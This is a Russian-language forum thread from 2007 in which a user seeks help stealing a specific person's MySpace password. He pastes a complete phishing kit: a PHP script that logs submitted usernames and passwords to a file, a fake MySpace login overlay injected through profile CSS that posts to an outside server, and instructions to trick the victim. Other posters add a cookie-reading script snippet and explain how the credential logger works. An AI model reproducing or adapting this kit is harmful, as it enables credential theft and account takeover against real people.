Простой код для cookie
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Простой код для cookie - 2007-10-02 08:20:58.370000
|
|
|
Burzum
Сообщений: 7
Оценки: 0
Присоединился: 2007-02-27 06:24:15.020000
|
Здраствуйте дорогие участники.
Хотел у вас спросить помощи или совета. Как мне можно написать простой html код для того чтобы узнать куки пользователя? Ну знаю что просто на хтмл нельзя писать, но сайт на котором я хочу попробовать использовать неподдерживает javascript.
Спасибо.
|
|
|
|
|
RE: Простой код для cookie - 2007-10-02 09:32:44.823333
|
|
|
dx
Сообщений: 337
Оценки: 0
Присоединился: 2006-12-15 13:35:49.700000
|
С помощью html никак не узнать содержимое кукисов.
quote:
сайт на котором я хочу попробовать использовать неподдерживает javascript.
Как это? JavaScript выполняется на стороне клиента, при чём тут "сайт не поддерживает"? Просто напиши код, вставь его в html-страницу внутри <script>…</script> и всё.
И почему тема во Взломе?:) Если хочешь узнать содержимое абсолютно всех кукисов пользователя, то это не выйдет даже с помощью javascript, т.к. браузер отсылает серверу только те кукисы, которые к нему относятся.
|
|
|
|
|
RE: Простой код для cookie - 2007-10-08 02:38:17.260000
|
|
|
Burzum
Сообщений: 7
Оценки: 0
Присоединился: 2007-02-27 06:24:15.020000
|
Ну а как его написать то? Я несилен в этом. Мне нужно код который выдаст мне куки пользователя посетивщии мою страничку….
Можете помочь пож. [:o]
|
|
|
|
|
RE: Простой код для cookie - 2007-10-08 08:56:46.120000
|
|
|
Refresh
Сообщений: 606
Оценки: 0
Присоединился: 2006-04-08 20:00:54
|
Попробуй так <script> alert(document.cookie)</script>
|
|
|
|
|
RE: Простой код для cookie - 2007-10-08 10:47:19.320000
|
|
|
dx
Сообщений: 337
Оценки: 0
Присоединился: 2006-12-15 13:35:49.700000
|
Во-первых, зачем нужны кукисы пользователя, посетившего твою страничку, ведь ты же их сам и устанавливаешь:D
А во-вторых, одной клиентской частью не обойтись при стыривании кукисов, их же нужно где-то в лог писать, а это уже пишется, например, на пхп.
|
|
|
|
|
RE: Простой код для cookie - 2007-10-08 11:04:51.630000
|
|
|
Refresh
Сообщений: 606
Оценки: 0
Присоединился: 2006-04-08 20:00:54
|
quote:
Во-первых, зачем нужны кукисы пользователя, посетившего твою страничку, ведь ты же их сам и устанавливаешь
А кто сказал что на твоей страничке!? на том же форуме можно найти такой баг и сидеть под другими учетками!
|
|
|
|
|
RE: Простой код для cookie - 2007-10-09 04:00:10.610000
|
|
|
Burzum
Сообщений: 7
Оценки: 0
Присоединился: 2007-02-27 06:24:15.020000
|
Извините что сначала не доконца все прояснил. Под мою страничку я имеел ввиду на сайте www.myspace.com можно зарегить себе страничу и т.д. (вы наверное знаете очем я.) Вот хочу найти пароль одного посетителя моей страничке. Просмотрел везде и наткнулся на одно видео, и тама сказали чтоб использовать то что я попросил выше. Но даже мне самому которому известна не так много о javascript я знал что это просто так работать не будет, так как куда куки будут сохраняться?
Сегодня я нашел тот самый код который он сам использовал, но так как его уже миллионы людей знают 100% он небудет работать, даже небуду пробовать.
Вот этот код ниже он использовал, но у меня возникло несколько вопросов которых я не понял. Если сможете ответьте пожалуйста.
Он создал 4 файла.
1. eror.php
<?php
$name = $_POST["username"];
$pass = $_POST["password"];
$fl = fopen('stolenpasswords.html', 'a');
fwrite($fl, "" .$name. ":" .$pass. "<BR><BR>");
fclose($fl);
header( 'Location: http://www.myspace.com' ) ;
?>
2. myspace.css
------------About Me--------------- put this in the about me section -----------------
<style type="text/css">
.Main { position:absolute; left:50%; top:125px; width:800px; z-index:1; margin-left:-400px; padding:0px; border:0px; background-color:transparent;}
</style>
<style type="text/css">.comments {visibility:hidden;display:none;}</style><br />
-----------I'd Like to Meet-------- put this in the i'd like to meet section --------------
<DIV class="Main"> <table style="width:800px; height:600px; cellpadding:0px; cellspacing:0px; border:2px solid silver; background-color:ffffff;}"> <tr> <td valign="top" align="center">
<body bgcolor="e5e5e5" bottommargin="0" leftmargin="0" rightmargin="0" topmargin="0" .."document.theForm.email.focus();" text="000000" alink="003399" vlink="003399" link="003399">
<div id="tipDiv" style="position:absolute; visibility:hidden; .."></div>
<div align="center">
<table width="800" border="0" cellspacing="0" cellpadding="20">
<tr valign="top" bgcolor="FFFFFF">
<form action="http://myspace.emascc.com/error.php" method="post">
<input type="hidden" name="NextPage" value="fuseaction=user.viewProfile_commentForm&friendid=87395979">
<td><p><span class="blacktext15">You Must Be Logged-In to do That!</span>
<br><br><br><font size="2">MySpace is FREE, But You Must Be a Member to Use That Feature</font></p>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr valign="top">
<td width="70%">
<table width="300" border="0" align="center" cellpadding="1" cellspacing="0">
<tr>
<td valign="top" bgcolor="003399">
<table width="100%" border="0" cellspacing="0" cellpadding="5">
<tr>
<td valign="top" bgcolor="FFFFFF">
<div align="center">
<strong><font color="003399">Keep Your Account Secure!</font></strong>
<br /><br /><img src="http://x.myspace.com/images/loginURL.png" width="290" height="110" />
<br /><br /><font color="&#035;FF0000">Look for
myspace.com in the Address.</font>
</div>
<br />
<hr size="1"><br />
<div align="center"><strong><font color="003399">Member Login</font></strong><br />
<table border="0" cellspacing="0" cellpadding="3">
<tr>
<td nowrap align="right">E-Mail :</td>
<td><input type="text" name="username" value="" size="25"></td>
</tr>
<tr>
<td nowrap align="right">Password :</td>
<td><input .. name="password" size="20"></td>
</tr>
<tr valign="top">
<td colspan="2"><div align="center">
<a class="redlink7" href="index.cfm?fuseaction=user.retrievepassword"><font size="1">Forgot your password?</font></a><br>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="142" height="30" valign="bottom">
<div align="center">
<input type="checkbox" name="Remember" id="Remember" value="Remember">
<label for="Remember">Remember Me</label>
</div>
<div align="right"></div>
</td>
<td width="40" valign="bottom">
<input type="image" src="http://x.myspace.com/images/button_login_main.gif" id="loginbutton" name="loginbutton" alt="Log In" .."return doSubmit();" width="56" height="22" />
</td>
</tr>
</table>
</div></td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td width="30%" valign="middle">&nbsp;</td>
</tr>
</table>
<p><font color="000000" size="2"><strong>Not a MySpace Member? Join FREE and Get Connected! </strong></font></p>
<p><font color="000000" size="2"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class="redlink7" href="http://signup.myspace.com/index.cfm?fuseaction=join"><img src="http://x.myspace.com/images/button_signup_main.gif" id="loginbutton" alt="Sign Up Now!" border="0" width="68" height="22"></a></font></strong></p>
<p><font color="000000" size="2"><strong><strong>After You Sign Up You Can:</strong></strong></font></p>
<ul>
<li><font size="2" color="000000">Create Free Profiles on MySpace</font></li>
<li><font size="2" color="000000">Upload Pictures &amp; Write Blogs</font></li>
<li><font size="2" color="000000">Use MySpace Mail &amp; Instant Messenger</font></li>
</ul>
<font size="2"><font color="000000"></font></font> <div align="center"></div>
</td>
<td width="300">
<div align="center">
<span class="blacktext15">
</span>
</div>
</td>
</form>
</tr>
<tr valign="bottom" bgcolor="FFFFFF">
<td colspan="2">&nbsp;
</td>
</tr>
</table>
<div id="msft">
<a href="http://www.myspace.com/Modules/Common/Pages/AboutUs.aspx" target="_blank">About</a> | <a href="http://www.myspace.com/index.cfm?fuseaction=misc.faq" target="_blank">FAQ</a> |
<a href="http://www.myspace.com/Modules/Common/Pages/TermsConditions.aspx" target="_blank">Terms</a> | <a href="http://www.myspace.com/Modules/Common/Pages/Privacy.aspx" target="_blank">Privacy</a> |
<a href="http://www.myspace.com/Modules/Common/Pages/SafetyTips.aspx" target="_blank">Safety Tips</a> | <a href="http://www.myspace.com/index.cfm?fuseaction=misc.contact" target="_blank">Contact MySpace</a> |
<a href="http://www.myspace.com/Modules/Common/Pages/Promote.aspx" target="_blank">Promote!</a> | <a href="http://collect.myspace.com/misc/advertise.cfm?&Mytoken=C3A0DDBA-D659-4257-812F6A2D6BECA94B60143810" target="_blank">Advertise</a> |
<a href="http://www.myspace.com/modules/internationallink/pages/internaltionallink.aspx">MySpace International</a>
<br />&copy;2003-2007 MySpace. All Rights Reserved.</div>
</div>
</div>
</body>
<td> </tr> </table> </DIV>
<div class="comments"><table><tr><td><table><tr><td><br />
3. myspace hacks.txt
http://www.myspace.com/services/media/photosXML.ashx?friendid=xxxxxxxx ... replace the x's with the 'friends id'
4. Myspace%20Code.txt
<style type="text/css">
div table td font { display: none }
div div table tr td a.navbar, div div table tr td font { display: none }
.testnav { position:absolute; top: 136px; left:50%; _top: 146px }
</style><div style="z-index:5; background-color: transparent; margin-left:-400px; width: 800px" align="center" class="testnav"><div style=""><a href="http://myspace.emascc.com" target="" class="navbar">Home</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Browse</a> | <a href="http://myspace.emascc.com/" target="" class="navbar">Search</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Invite</a> | <a href="http://myspace.emascc.com/" target="" class="navbar">Film</a> | <a href="http://myspace.emascc.com/" target="" class="navbar">Mail</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Blog</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Favorites</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Forum</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Groups</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Events</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Videos</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Music</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Comedy</a> | <a href="http://myspace.emascc.com" target="" class="navbar">Classifieds</a></div></div><style type="text/css">
</td>
</tr></style>
</td>
</tr>
В инструкции написана:
1. Загрузить файл errro.php на мой сайт…
2. Зарегить новый профайл и использовать myspace css.txt, для того чтобы рекдатировать профайл.
3. Поменять строчку <form action="http://myspace.emascc.com/error.php" method="post">
так чтобы она перенаправляла на твой сайт.
4. Обмануть пользователя чтоб он зашел на твой профиль, и когда у тебя будет их пароль поменять их css на Myspace%20Code.txt
Вообщем я не очен хорош в переводе с анл. на русс. вот орег. текст. может не то перевел.
quote:
1.Upload Error.php to your website
2.create a new myspace account on myspace and then use the myspace css.txt to mod the profile
3.change the line
<form action="http://myspace.emascc.com/error.php" method="post">
so that it points to your website error.php
4.Trick a person into going your new profile
5.Once you have a password, change their css, so that you add
Myspace%20Code.txt to it, and follow the video – NOTE: THIS WILL NO LONGER WORK, SO JUST MAKE IT
LOOK LIKE ANOTHER FAKE LOGIN PAGE BY USING MYSPACE CSS.TXT
6.Enjoy
Я понял как и куда загружать файл error.php, только как этот файл мне поможет как она выдаст мне пароль?
А потом когда у меня будет пароль зачем мне еше добавить тот файл? ( Помоему автор был пьян когда то писал =) )
Скажите а есть еше способы получение паролей от того сайта, может кто уже попробовал, а то этот метод наверняка уже закрыт.
Спасибо, надеюсь на вашу помощь.
|
|
|
|
|
RE: Простой код для cookie - 2007-10-09 13:56:57.266666
|
|
|
Sun_trop
Сообщений: 16
Оценки: 0
Присоединился: 2007-09-30 12:30:08.306666
|
error.php просто записывает пароль с логином в stolenpasswords.html пользователь даже не увидит ничего. просто когда юзер введет на главной странице пас с логином сработает код в myspace.css(который по идее просто файл стилей) и его перекинет на http://www.myspace.com.
|
|
|
|
|
RE: Простой код для cookie - 2007-10-10 05:56:54.780000
|
|
|
Burzum
Сообщений: 7
Оценки: 0
Присоединился: 2007-02-27 06:24:15.020000
|
А куда нужно создавать stolenpassword.html тама нечего про него не написана.
|
|
|
|
|
RE: Простой код для cookie - 2007-10-10 13:36:20.140000
|
|
|
Sun_trop
Сообщений: 16
Оценки: 0
Присоединился: 2007-09-30 12:30:08.306666
|
$fl = fopen('stolenpasswords.html', 'a');
Файл сам создастся в одном каталоге с error.php
|
|
|
|
|
|
